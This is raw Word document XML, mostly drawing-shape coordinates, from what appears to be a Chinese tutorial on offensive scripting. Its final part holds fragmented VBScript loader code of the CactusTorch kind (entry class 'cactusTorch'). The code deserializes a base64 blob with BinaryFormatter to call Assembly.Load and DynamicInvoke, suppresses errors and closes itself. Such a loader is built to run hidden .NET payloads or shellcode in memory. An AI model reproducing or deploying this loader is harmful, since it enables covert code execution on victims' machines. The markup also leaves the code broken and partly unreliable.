,3987,9659,3992,9659,3996,9659,4001,9659,4006,9659,4010,9659,4015,9659,4020,9659,4026,9659,4031,9659,4036,9659,4042,9659,4047,9659,4053,9659,4058,9659,4064,9659,4070,9659,4076,9659,4076,9659,4076,9659,4076,9659,4076,9659,4076,9659,4076,9659,4076,9659,4076,9659,4076,9659,4076,9659,4076,9659,4076,9659,4076,9659,4076,9659,4076,9659,4076,9659,4076,9659,4076,9660,4076,9660,4076,9660,4076,9660,4076,9660,4076,9660,4076,9661,4076,9661,4076,9661,4076,9662,4076,9662,4076,9662,4076,9663,4076,9663,4076,9663,4076,9664,4076,9664,4076,9665,4076,9665,4076,9666,4076,9667,4076,9667,4076,9668,4076,9669,4076,9669,4076,9670,4076,9671,4076,9672,4076,9673,4076,9674,4076,9675,4076,9676,4076,9677,4076,9678,4076,9679,4076,9680,4076,9681,4076,9683,4076,9684,4076,9685,4076,9687,4076,9688,4076,9690,4076,9692,4076,9693,4076,9695,4076,9697,4076,9699,4076,9700,4076,9702,4076,9704,4076,9706,4076,9709,4076,9711,4076,9713,4076,9715,4076,9718,4076,9720,4076,9723,4076,9725,4076,9728,4076,9731,4076,9734,4076,9736,4076,9739,4076,9742,4076,9745,4076,9749,4076,9752,4076,9755,4076,9759,4076,9762,4076,9766,4076,9769,4076,9773,4076,9777,4076,9781,4076,9785,4076,9789,4076,9793,4076,9797,4076,9801,4076,9806,4076,9810,4076,9815,4076,9820,4076,9824,4076,9829,4076,9834,4076,9839,4076,9844,4076,9850,4076,9855,4076,9860,4076,9866,4076,9872,4076,9877,4076,9883,4076,9889,4076,9895,4076,9901,4076,9908,4076,9914,4076,9914,4076,9914,4076,9914,4076,9914,4076,9914,4076,9914,4076,9914,4076,9914,4076,9914,4076,9914,4076,9914,4076,9914,4076,9914,4076,9914,4076,9914,4076,9914,4075,9914,4075,9914,4075,9914,4075,9914,4075,9914,4075,9914,4075,9914,4074,9914,4074,9914,4074,9914,4074,9914,4073,9914,4073,9914,4073,9914,4072,9914,4072,9914,4071,9914,4071,9914,4070,9914,4070,9914,4069,9914,4069,9914,4068,9914,4068,9914,4067,9914,4066,9914,4065,9914,4065,9914,4064,9914,4063,9914,4062,9914,4061,9914,4060,9914,4059,9914,4058,9914,4057,9914,4056,9914,4055,9914,4054,9914,4052,9914,4051,9914,4050,9914,4048,9914,4047,9914,4045,9914,4044,9914,4042,9914,4040,9914,4039,9914,4037,9914,4035,9914,4033,9914,4031,9914,4029,9914,4027,9914,4025,9914,4023,9914,4021,9914,4018,9914,4016,9914,4014,9914,4011,9914,4008,9914,4006,9914,4003,9914,4000,9914,3997,9914,3995,9914,3992,9914,3989,9914,3985,9914,3982,9914,3979,9914,3976,9914,3972,9914,3969,9914,3965,9914,3961,9914,3958,9914,3954,9914,3950,9914,3946,9914,3942,9914,3938,9914,3934,9914,3929,9914,3925,9914,3920,9914,3916,9914,3911,9914,3906,9914,3901,9914,3897,9914,3892,9914,3886,9914,3881,9914,3876,9914,3870,9914,3865,9914,3859,9914,3854,9914,3848,9914,3842,9914,3836,9914,3836,9914,3836,9914,3836,9914,3836,9914,3836,9914,3836,9914,3836,9914,3836,9914,3836,9914,3836,9914,3836,9914,3836,9914,3836,9914,3836,9914,3836,9914,3836,9913,3836,9913,3836,9913,3836,9913,3836,9913,3836,9913,3836,9913,3836,9912,3836,9912,3836,9912,3836,9912,3836,9911,3836,9911,3836,9911,3836,9910,3836,9910,3836,9909,3836,9909,3836,9909,3836,9908,3836,9908,3836,9907,3836,9906,3836,9906,3836,9905,3836,9904,3836,9904,3836,9903,3836,9902,3836,9901,3836,9900,3836,9899,3836,9898,3836,9897,3836,9896,3836,9895,3836,9894,3836,9893,3836,9891,3836,9890,3836,9889,3836,9887,3836,9886,3836,9884,3836,9883,3836,9881,3836,9880,3836,9878,3836,9876,3836,9874,3836,9872,3836,9870,3836,9868,3836,9866,3836,9864,3836,9862,3836,9860,3836,9857,3836,9855,3836,9853,3836,9850,3836,9848,3836,9845,3836,9842,3836,9839,3836,9836,3836,9834,3836,9831,3836,9827,3836,9824,3836,9821,3836,9818,3836,9814,3836,9811,3836,9807,3836,9804,3836,9800,3836,9796,3836,9792,3836,9788,3836,9784,3836,9780,3836,9776,3836,9772,3836,9767,3836,9763,3836,9758,3836,9753,3836,9749,3836,9744,3836,9739,3836,9734,3836,9729,3836,9723,3836,9718,3836,9712,3836,9707,3836,9701,3836,9696,3836,9690,3836,9684,3836,9678,3836,9672,3836,9665,3836,9659e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:106.500pt;margin-top:590.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2130,11810" coordsize="130,270">
        <v:shape style="position:absolute;left:2130;top:11810;width:130;height:270" coordorigin="2130,11810" coordsize="130,270" path="m2155,11835l2155,11835,2155,11835,2155,11835,2155,11835,2155,11835,2155,11835,2155,11835,2155,11835,2155,11835,2155,11835,2155,11835,2155,11835,2155,11835,2155,11835,2155,11835,2155,11835,2155,11835,2155,11835,2155,11835,2156,11835,2156,11835,2156,11835,2156,11835,2156,11835,2156,11835,2156,11835,2156,11835,2156,11835,2157,11835,2157,11835,2157,11835,2157,11835,2157,11835,2158,11835,2158,11835,2158,11835,2158,11835,2159,11835,2159,11835,2159,11835,2160,11835,2160,11835,2160,11835,2161,11835,2161,11835,2162,11835,2162,11835,2162,11835,2163,11835,2163,11835,2164,11835,2165,11835,2165,11835,2166,11835,2166,11835,2167,11835,2168,11835,2168,11835,2169,11835,2170,11835,2170,11835,2171,11835,2172,11835,2173,11835,2174,11835,2175,11835,2176,11835,2177,11835,2177,11835,2178,11835,2180,11835,2181,11835,2182,11835,2183,11835,2184,11835,2185,11835,2186,11835,2188,11835,2189,11835,2190,11835,2192,11835,2193,11835,2194,11835,2196,11835,2197,11835,2199,11835,2200,11835,2202,11835,2204,11835,2205,11835,2207,11835,2209,11835,2211,11835,2212,11835,2214,11835,2216,11835,2218,11835,2220,11835,2222,11835,2224,11835,2226,11835,2228,11835,2231,11835,2233,11835,2235,11835,2238,11835,2240,11835,2242,11835,2245,11835,2247,11835,2250,11835,2253,11835,2255,11835,2258,11835,2261,11835,2263,11835,2266,11835,2269,11835,2272,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11836,2275,11836,2275,11836,2275,11836,2275,11836,2275,11836,2275,11837,2275,11837,2275,11837,2275,11837,2275,11838,2275,11838,2275,11838,2275,11839,2275,11839,2275,11839,2275,11840,2275,11840,2275,11841,2275,11841,2275,11842,2275,11843,2275,11843,2275,11844,2275,11845,2275,11845,2275,11846,2275,11847,2275,11848,2275,11849,2275,11850,2275,11851,2275,11852,2275,11853,2275,11854,2275,11855,2275,11856,2275,11858,2275,11859,2275,11860,2275,11862,2275,11863,2275,11865,2275,11866,2275,11868,2275,11869,2275,11871,2275,11873,2275,11875,2275,11877,2275,11878,2275,11880,2275,11883,2275,11885,2275,11887,2275,11889,2275,11891,2275,11894,2275,11896,2275,11899,2275,11901,2275,11904,2275,11907,2275,11910,2275,11912,2275,11915,2275,11918,2275,11922,2275,11925,2275,11928,2275,11931,2275,11935,2275,11938,2275,11942,2275,11945,2275,11949,2275,11953,2275,11957,2275,11961,2275,11965,2275,11969,2275,11973,2275,11977,2275,11982,2275,11986,2275,11991,2275,11996,2275,12000,2275,12005,2275,12010,2275,12015,2275,12020,2275,12026,2275,12031,2275,12036,2275,12042,2275,12048,2275,12053,2275,12059,2275,12065,2275,12071,2275,12077,2275,12084,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2274,12090,2274,12090,2274,12090,2274,12090,2274,12090,2274,12090,2274,12090,2274,12090,2273,12090,2273,12090,2273,12090,2273,12090,2273,12090,2272,12090,2272,12090,2272,12090,2272,12090,2271,12090,2271,12090,2271,12090,2270,12090,2270,12090,2269,12090,2269,12090,2269,12090,2268,12090,2268,12090,2267,12090,2267,12090,2266,12090,2266,12090,2265,12090,2265,12090,2264,12090,2263,12090,2263,12090,2262,12090,2261,12090,2261,12090,2260,12090,2259,12090,2258,12090,2257,12090,2256,12090,2256,12090,2255,12090,2254,12090,2253,12090,2252,12090,2251,12090,2250,12090,2249,12090,2247,12090,2246,12090,2245,12090,2244,12090,2243,12090,2241,12090,2240,12090,2239,12090,2237,12090,2236,12090,2234,12090,2233,12090,2231,12090,2230,12090,2228,12090,2227,12090,2225,12090,2223,12090,2221,12090,2220,12090,2218,12090,2216,12090,2214,12090,2212,12090,2210,12090,2208,12090,2206,12090,2204,12090,2202,12090,2200,12090,2197,12090,2195,12090,2193,12090,2190,12090,2188,12090,2185,12090,2183,12090,2180,12090,2178,12090,2175,12090,2172,12090,2170,12090,2167,12090,2164,12090,2161,12090,2158,12090,2155,12090,2155,12090,2155,12090,2155,12090,2155,12090,2155,12090,2155,12090,2155,12090,2155,12090,2155,12090,2155,12090,2155,12090,2155,12090,2155,12090,2155,12090,2155,12090,2155,12090,2155,12089,2155,12089,2155,12089,2155,12089,2155,12089,2155,12089,2155,12088,2155,12088,2155,12088,2155,12088,2155,12087,2155,12087,2155,12087,2155,12086,2155,12086,2155,12086,2155,12085,2155,12085,2155,12084,2155,12084,2155,12083,2155,12082,2155,12082,2155,12081,2155,12080,2155,12080,2155,12079,2155,12078,2155,12077,2155,12076,2155,12075,2155,12074,2155,12073,2155,12072,2155,12071,2155,12070,2155,12069,2155,12068,2155,12066,2155,12065,2155,12064,2155,12062,2155,12061,2155,12059,2155,12057,2155,12056,2155,12054,2155,12052,2155,12050,2155,12049,2155,12047,2155,12045,2155,12042,2155,12040,2155,12038,2155,12036,2155,12034,2155,12031,2155,12029,2155,12026,2155,12024,2155,12021,2155,12018,2155,12015,2155,12013,2155,12010,2155,12007,2155,12004,2155,12000,2155,11997,2155,11994,2155,11990,2155,11987,2155,11983,2155,11980,2155,11976,2155,11972,2155,11968,2155,11964,2155,11960,2155,11956,2155,11952,2155,11948,2155,11943,2155,11939,2155,11934,2155,11929,2155,11925,2155,11920,2155,11915,2155,11910,2155,11905,2155,11899,2155,11894,2155,11889,2155,11883,2155,11877,2155,11872,2155,11866,2155,11860,2155,11854,2155,11848,2155,11841,2155,11835e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:112.500pt;margin-top:590.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2250,11810" coordsize="130,270">
        <v:shape style="position:absolute;left:2250;top:11810;width:130;height:270" coordorigin="2250,11810" coordsize="130,270" path="m2275,11835l2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2275,11835,2276,11835,2276,11835,2276,11835,2276,11835,2276,11835,2276,11835,2276,11835,2276,11835,2276,11835,2277,11835,2277,11835,2277,11835,2277,11835,2277,11835,2277,11835,2278,11835,2278,11835,2278,11835,2278,11835,2279,11835,2279,11835,2279,11835,2280,11835,2280,11835,2280,11835,2281,11835,2281,11835,2282,11835,2282,11835,2283,11835,2283,11835,2284,11835,2284,11835,2285,11835,2285,11835,2286,11835,2286,11835,2287,11835,2288,11835,2288,11835,2289,11835,2290,11835,2291,11835,2291,11835,2292,11835,2293,11835,2294,11835,2295,11835,2296,11835,2297,11835,2298,11835,2299,11835,2300,11835,2301,11835,2302,11835,2303,11835,2304,11835,2305,11835,2306,11835,2308,11835,2309,11835,2310,11835,2312,11835,2313,11835,2314,11835,2316,11835,2317,11835,2319,11835,2320,11835,2322,11835,2324,11835,2325,11835,2327,11835,2329,11835,2331,11835,2332,11835,2334,11835,2336,11835,2338,11835,2340,11835,2342,11835,2344,11835,2346,11835,2349,11835,2351,11835,2353,11835,2355,11835,2358,11835,2360,11835,2362,11835,2365,11835,2367,11835,2370,11835,2373,11835,2375,11835,2378,11835,2381,11835,2384,11835,2386,11835,2389,11835,2392,11835,2395,11835,2395,11835,2395,11835,2395,11835,2395,11835,2395,11835,2395,11835,2395,11835,2395,11835,2395,11835,2395,11835,2395,11835,2395,11835,2395,11835,2395,11835,2395,11835,2395,11835,2395,11836,2395,11836,2395,11836,2395,11836,2395,11836,2395,11836,2395,11837,2395,11837,2395,11837,2395,11837,2395,11838,2395,11838,2395,11838,2395,11839,2395,11839,2395,11839,2395,11840,2395,11840,2395,11841,2395,11841,2395,11842,2395,11843,2395,11843,2395,11844,2395,11845,2395,11845,2395,11846,2395,11847,2395,11848,2395,11849,2395,11850,2395,11851,2395,11852,2395,11853,2395,11854,2395,11855,2395,11856,2395,11858,2395,11859,2395,11860,2395,11862,2395,11863,2395,11865,2395,11866,2395,11868,2395,11869,2395,11871,2395,11873,2395,11875,2395,11877,2395,11878,2395,11880,2395,11883,2395,11885,2395,11887,2395,11889,2395,11891,2395,11894,2395,11896,2395,11899,2395,11901,2395,11904,2395,11907,2395,11910,2395,11912,2395,11915,2395,11918,2395,11922,2395,11925,2395,11928,2395,11931,2395,11935,2395,11938,2395,11942,2395,11945,2395,11949,2395,11953,2395,11957,2395,11961,2395,11965,2395,11969,2395,11973,2395,11977,2395,11982,2395,11986,2395,11991,2395,11996,2395,12000,2395,12005,2395,12010,2395,12015,2395,12020,2395,12026,2395,12031,2395,12036,2395,12042,2395,12048,2395,12053,2395,12059,2395,12065,2395,12071,2395,12077,2395,12084,2395,12090,2395,12090,2395,12090,2395,12090,2395,12090,2395,12090,2395,12090,2395,12090,2395,12090,2395,12090,2395,12090,2395,12090,2395,12090,2395,12090,2395,12090,2395,12090,2395,12090,2395,12090,2395,12090,2395,12090,2395,12090,2395,12090,2395,12090,2394,12090,2394,12090,2394,12090,2394,12090,2394,12090,2394,12090,2394,12090,2393,12090,2393,12090,2393,12090,2393,12090,2393,12090,2392,12090,2392,12090,2392,12090,2392,12090,2391,12090,2391,12090,2391,12090,2390,12090,2390,12090,2390,12090,2389,12090,2389,12090,2388,12090,2388,12090,2387,12090,2387,12090,2386,12090,2386,12090,2385,12090,2385,12090,2384,12090,2383,12090,2383,12090,2382,12090,2381,12090,2381,12090,2380,12090,2379,12090,2378,12090,2377,12090,2377,12090,2376,12090,2375,12090,2374,12090,2373,12090,2372,12090,2371,12090,2370,12090,2369,12090,2367,12090,2366,12090,2365,12090,2364,12090,2363,12090,2361,12090,2360,12090,2359,12090,2357,12090,2356,12090,2354,12090,2353,12090,2351,12090,2350,12090,2348,12090,2347,12090,2345,12090,2343,12090,2342,12090,2340,12090,2338,12090,2336,12090,2334,12090,2332,12090,2330,12090,2328,12090,2326,12090,2324,12090,2322,12090,2320,12090,2317,12090,2315,12090,2313,12090,2310,12090,2308,12090,2305,12090,2303,12090,2300,12090,2298,12090,2295,12090,2292,12090,2290,12090,2287,12090,2284,12090,2281,12090,2278,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12090,2275,12089,2275,12089,2275,12089,2275,12089,2275,12089,2275,12089,2275,12088,2275,12088,2275,12088,2275,12088,2275,12087,2275,12087,2275,12087,2275,12086,2275,12086,2275,12086,2275,12085,2275,12085,2275,12084,2275,12084,2275,12083,2275,12082,2275,12082,2275,12081,2275,12080,2275,12080,2275,12079,2275,12078,2275,12077,2275,12076,2275,12075,2275,12074,2275,12073,2275,12072,2275,12071,2275,12070,2275,12069,2275,12068,2275,12066,2275,12065,2275,12064,2275,12062,2275,12061,2275,12059,2275,12057,2275,12056,2275,12054,2275,12052,2275,12050,2275,12049,2275,12047,2275,12045,2275,12042,2275,12040,2275,12038,2275,12036,2275,12034,2275,12031,2275,12029,2275,12026,2275,12024,2275,12021,2275,12018,2275,12015,2275,12013,2275,12010,2275,12007,2275,12004,2275,12000,2275,11997,2275,11994,2275,11990,2275,11987,2275,11983,2275,11980,2275,11976,2275,11972,2275,11968,2275,11964,2275,11960,2275,11956,2275,11952,2275,11948,2275,11943,2275,11939,2275,11934,2275,11929,2275,11925,2275,11920,2275,11915,2275,11910,2275,11905,2275,11899,2275,11894,2275,11889,2275,11883,2275,11877,2275,11872,2275,11866,2275,11860,2275,11854,2275,11848,2275,11841,2275,11835e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:154.500pt;margin-top:590.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3090,11810" coordsize="130,270">
        <v:shape style="position:absolute;left:3090;top:11810;width:130;height:270" coordorigin="3090,11810" coordsize="130,270" path="m3116,11835l3116,11835,3116,11835,3116,11835,3116,11835,3116,11835,3116,11835,3116,11835,3116,11835,3116,11835,3116,11835,3116,11835,3116,11835,3116,11835,3116,11835,3116,11835,3116,11835,3116,11835,3116,11835,3116,11835,3116,11835,3116,11835,3116,11835,3116,11835,3116,11835,3117,11835,3117,11835,3117,11835,3117,11835,3117,11835,3117,11835,3117,11835,3118,11835,3118,11835,3118,11835,3118,11835,3119,11835,3119,11835,3119,11835,3119,11835,3120,11835,3120,11835,3120,11835,3121,11835,3121,11835,3122,11835,3122,11835,3123,11835,3123,11835,3123,11835,3124,11835,3124,11835,3125,11835,3126,11835,3126,11835,3127,11835,3127,11835,3128,11835,3129,11835,3129,11835,3130,11835,3131,11835,3132,11835,3133,11835,3133,11835,3134,11835,3135,11835,3136,11835,3137,11835,3138,11835,3139,11835,3140,11835,3141,11835,3142,11835,3143,11835,3144,11835,3146,11835,3147,11835,3148,11835,3149,11835,3151,11835,3152,11835,3153,11835,3155,11835,3156,11835,3158,11835,3159,11835,3161,11835,3162,11835,3164,11835,3166,11835,3168,11835,3169,11835,3171,11835,3173,11835,3175,11835,3177,11835,3179,11835,3181,11835,3183,11835,3185,11835,3187,11835,3189,11835,3191,11835,3193,11835,3196,11835,3198,11835,3200,11835,3203,11835,3205,11835,3208,11835,3210,11835,3213,11835,3216,11835,3218,11835,3221,11835,3224,11835,3227,11835,3230,11835,3233,11835,3236,11835,3236,11835,3236,11835,3236,11835,3236,11835,3236,11835,3236,11835,3236,11835,3236,11835,3236,11835,3236,11835,3236,11835,3236,11835,3236,11835,3236,11835,3236,11835,3236,11835,3236,11836,3236,11836,3236,11836,3236,11836,3236,11836,3236,11836,3236,11837,3236,11837,3236,11837,3236,11837,3236,11838,3236,11838,3236,11838,3236,11839,3236,11839,3236,11839,3236,11840,3236,11840,3236,11841,3236,11841,3236,11842,3236,11843,3236,11843,3236,11844,3236,11845,3236,11845,3236,11846,3236,11847,3236,11848,3236,11849,3236,11850,3236,11851,3236,11852,3236,11853,3236,11854,3236,11855,3236,11856,3236,11858,3236,11859,3236,11860,3236,11862,3236,11863,3236,11865,3236,11866,3236,11868,3236,11869,3236,11871,3236,11873,3236,11875,3236,11877,3236,11878,3236,11880,3236,11883,3236,11885,3236,11887,3236,11889,3236,11891,3236,11894,3236,11896,3236,11899,3236,11901,3236,11904,3236,11907,3236,11910,3236,11912,3236,11915,3236,11918,3236,11922,3236,11925,3236,11928,3236,11931,3236,11935,3236,11938,3236,11942,3236,11945,3236,11949,3236,11953,3236,11957,3236,11961,3236,11965,3236,11969,3236,11973,3236,11977,3236,11982,3236,11986,3236,11991,3236,11996,3236,12000,3236,12005,3236,12010,3236,12015,3236,12020,3236,12026,3236,12031,3236,12036,3236,12042,3236,12048,3236,12053,3236,12059,3236,12065,3236,12071,3236,12077,3236,12084,3236,12090,3236,12090,3236,12090,3236,12090,3236,12090,3236,12090,3236,12090,3236,12090,3236,12090,3236,12090,3236,12090,3236,12090,3236,12090,3236,12090,3235,12090,3235,12090,3235,12090,3235,12090,3235,12090,3235,12090,3235,12090,3235,12090,3235,12090,3235,12090,3235,12090,3235,12090,3235,12090,3234,12090,3234,12090,3234,12090,3234,12090,3234,12090,3234,12090,3233,12090,3233,12090,3233,12090,3233,12090,3232,12090,3232,12090,3232,12090,3231,12090,3231,12090,3231,12090,3230,12090,3230,12090,3230,12090,3229,12090,3229,12090,3228,12090,3228,12090,3227,12090,3227,12090,3226,12090,3226,12090,3225,12090,3224,12090,3224,12090,3223,12090,3222,12090,3222,12090,3221,12090,3220,12090,3219,12090,3219,12090,3218,12090,3217,12090,3216,12090,3215,12090,3214,12090,3213,12090,3212,12090,3211,12090,3210,12090,3209,12090,3208,12090,3207,12090,3206,12090,3204,12090,3203,12090,3202,12090,3201,12090,3199,12090,3198,12090,3196,12090,3195,12090,3193,12090,3192,12090,3190,12090,3189,12090,3187,12090,3185,12090,3184,12090,3182,12090,3180,12090,3178,12090,3176,12090,3175,12090,3173,12090,3171,12090,3169,12090,3166,12090,3164,12090,3162,12090,3160,12090,3158,12090,3155,12090,3153,12090,3151,12090,3148,12090,3146,12090,3143,12090,3141,12090,3138,12090,3136,12090,3133,12090,3130,12090,3127,12090,3124,12090,3122,12090,3119,12090,3116,12090,3116,12090,3116,12090,3116,12090,3116,12090,3116,12090,3116,12090,3116,12090,3116,12090,3116,12090,3116,12090,3116,12090,3116,12090,3116,12090,3116,12090,3116,12090,3116,12090,3116,12089,3116,12089,3116,12089,3116,12089,3116,12089,3116,12089,3116,12088,3116,12088,3116,12088,3116,12088,3116,12087,3116,12087,3116,12087,3116,12086,3116,12086,3116,12086,3116,12085,3116,12085,3116,12084,3116,12084,3116,12083,3116,12082,3116,12082,3116,12081,3116,12080,3116,12080,3116,12079,3116,12078,3116,12077,3116,12076,3116,12075,3116,12074,3116,12073,3116,12072,3116,12071,3116,12070,3116,12069,3116,12068,3116,12066,3116,12065,3116,12064,3116,12062,3116,12061,3116,12059,3116,12057,3116,12056,3116,12054,3116,12052,3116,12050,3116,12049,3116,12047,3116,12045,3116,12042,3116,12040,3116,12038,3116,12036,3116,12034,3116,12031,3116,12029,3116,12026,3116,12024,3116,12021,3116,12018,3116,12015,3116,12013,3116,12010,3116,12007,3116,12004,3116,12000,3116,11997,3116,11994,3116,11990,3116,11987,3116,11983,3116,11980,3116,11976,3116,11972,3116,11968,3116,11964,3116,11960,3116,11956,3116,11952,3116,11948,3116,11943,3116,11939,3116,11934,3116,11929,3116,11925,3116,11920,3116,11915,3116,11910,3116,11905,3116,11899,3116,11894,3116,11889,3116,11883,3116,11877,3116,11872,3116,11866,3116,11860,3116,11854,3116,11848,3116,11841,3116,11835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86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179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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAA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AAAAAAAAAAAA"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180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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAA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AAAAAAAAAAAA"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181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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAA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AAAAAAAAAAAA"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182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"AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0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ZW0u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UmVmbGVjdGlv"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="14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183</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体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14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"bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA"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6411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184</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体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entry_class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996c38"/>
          <w:spacing w:val="14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659800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"cactusTorch"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185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186</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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Dim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fmt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al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o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187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Set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fmt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CreateObject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"System.Runtime.Serialization.Formatters.Binar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y.BinaryFormatter"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188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Set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al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CreateObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="16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"System.Collections.ArrayList"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="31"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)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6291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189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al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Add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fmt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SurrogateSelector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190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191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Set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d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fmt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Deserialize_2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Base64ToStream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s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192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Set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o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DynamicInvoke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="1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al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ToArray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(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CreateInstance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="15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entry_class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)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193</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体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o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flame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binary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,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code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8813" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>194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10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>End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404549"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sub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195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2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>196</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="93"/>
        </w:rPr>
        <w:t> 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SetVersion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197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On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Error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Resume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Next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1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>198</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="91"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Run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199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If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Err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Number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&lt;&gt;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Then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200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="5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Debug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Err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Description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201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Err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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Clear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8933" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>202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12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>End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11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>If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203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2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>204</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="91"/>
        </w:rPr>
        <w:t> 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self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close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8572" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="18"/>
